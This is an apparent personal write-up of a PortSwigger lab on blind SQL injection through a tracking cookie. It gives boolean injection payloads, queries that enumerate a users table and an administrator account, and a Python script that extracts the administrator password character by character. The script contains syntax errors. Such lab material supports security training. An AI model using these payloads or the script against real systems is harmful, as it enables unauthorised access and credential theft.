
# Portswigger SQLi Lab #9

## Blind SQL injection with conditional responses. 

<br>

<br>

If the application responds differently in a true use case versus a fale use case, we can use a blind SQLi.

**1) Confirm that the parameter is vulnerable to blind SQLi.**

The Cookie TrackingID looks like it is set a string value. Imagine the value is attached to a request such as the following:
Select tracking-id from tracking-table where trackingID = 'nLiXTfFOQB9PLTyJ'--

If this tracking ID exists the query returns a value such as a Welcome back message.
If this tracking ID doesn't exit the query returns nothing and there is no welcome back message.

This is the basis of how SQL queries can be used to tell us information, even when the output can't be seen. A blind SQLi such as this will use boolean logic in order to determine information.

This input field can be confirmed as a blind injection method by first changing the tracking ID in a query and search for the "welcome back" message.

Since there were no "welcome back" search matches in the 200 response code when the TrackingID was changed from gw7Fyl8B18NpxBmY to ABCDEFGHIJKLMNOP, you can move on to the next step for verifying the blind SQLi.

Now, determine whether the welcome back message can show us true and falses using boolean logic.

This will make our imaginary request look something like:

```select tracking-id from tracking-table where trackingID = 'nLiXTfFOQB9PLTyJ' and 1=1--'```
This true use case should show a "welcome back!" message.
However, since we just see our field being: 
```Cookie: TrackingID=gw7Fyl8B18NpxBmY```
The actual injection will be
' and 1=1--
This is put in after the tracking ID like the following:
```Cookie: TrackingID= gw7Fyl8B18NpxBmY' and 1=1--```
Don't forget to URL encode your injected code using CTRL+u on Windows or cmd+u on iOS.

This query gave us a welcome back message in the 200 response code, so it is showing the true boolean logic correctly. Now let's test it for false boolean logic.

```select tracking-id from tracking-table where trackingID = 'gw7Fyl8B18NpxBmY' and 1=0--```
Since this is a True+False case, the result should be false and there should be no "welcome back!" message.

In the 200 response, no matches were found for searching "welcome back!".

Now we've confirmed that a true statement will show a welcome back message and a false statement will not show a welcome back message.

<br>

**2) Confirm that we have a users table.**

For this, our imaginary request will change to the following:

select tracking-id from tracking-table where trackingID = 'gw7Fyl8B18NpxBmY' and (select 'x' from users LIMIT 1)='x'--

<br>

**3) Confirm that username adminsitrator exists in the users table.**

```select tracking-id from tracking-table where trackingID = 'gw7Fyl8B18NpxBmY' and (select username from users where username='administrator')='administrator'--```

Received a "welcome back!" message in the 200 response code so an administrator user exists

<br>

**4) Enumerate the password of the administrator user.**

First, start with the length of the password. 

```select tracking-id from tracking-table where trackingID = 'gw7Fyl8B18NpxBmY' and (select username from users where username='administrator' and LENGTH(password)>1)='administrator'--```

We can send it to the Intruder. Here we will select just the field we want to change, or iterate, which is the "1" in "LENGTH(password)>1)". Once just the "1" is highlighted, click the "Add Then in the settings, make sure it will increase from 1 to 30 by a step of 1. I chose 30 because passwords usually aren't longer than 24 characters, but I went a little higher just to be sure.

The intruder showed that the welcome back message was displayed up until 20, which means the password length is exactly 20 characters.

Now the intruder can be used to determine each character of the password through iteration just like the above message.
The payload will be slightly altered:
```select tracking-id from tracking-table where trackingID = 'gw7Fyl8B18NpxBmY' and (select substring(password,1,1) from users where username='administrator')='a'--```

No welcome back message, so the first character is not "a". 

Since this will require 2 payloads changing constantly, we'll use a script since I don't currently own the professional version of Burp Suite.

```python
import sys
import requests
import urllib3
import urllib

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

def sqli_password(url):
    password_extracted = ""
    for i in range (1,21):
        for j in range (32,126):
            sqli_payload = "' and (select ascii(substring(password,%s,1)) from users where username='administrator')='%s'--" %(i,j)
            sqli_payload_encoded = urllib.parse.quote(sqli_payload)
            cookies = {'TrackingID': 'NbsQfi7vZr8lVbJt'+sqli_payload_encoded,'session': 'xV5RtywupsY5wOKXzm3ivIh1Oj6Puhgv'}
            r = requests.get(url, cookies=cookies, verify=False, proxies=proxies)
            if "Welcome" not in r.text:
                sys.stdout.write('\r'+ password_extracted + chr(j))
                sys.stdout.flush()
            else:
                password_extracted += chr(j)
                sys.stdout.write('\r' + password_extracted)
                sys.stdout.flush()
                break

def main()
    if len(sys.argv) !=2:
        print("(+) Usage: %s <url>" % sys.argv[0])
        print("(+) Example: %s www.example.com" % sys.argv[0])

    url = sys.argv[1]
    prit ("(+) Retrieving administrator password...")
    sqli_password(url)

if __name__ == "__main__":
    main()
```

<br>

**5. After running the script or using Professional Burp Suite's iteration, enter your username and password to complete the lab.**